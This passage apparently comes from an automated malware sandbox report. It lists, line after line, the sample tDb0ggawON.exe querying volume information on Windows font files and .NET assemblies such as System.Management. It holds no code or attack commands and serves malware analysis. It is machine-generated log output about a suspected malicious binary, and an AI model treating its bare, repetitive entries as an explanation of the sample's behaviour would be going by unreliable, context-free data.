                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Users\user\Desktop\tDb0ggawON.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
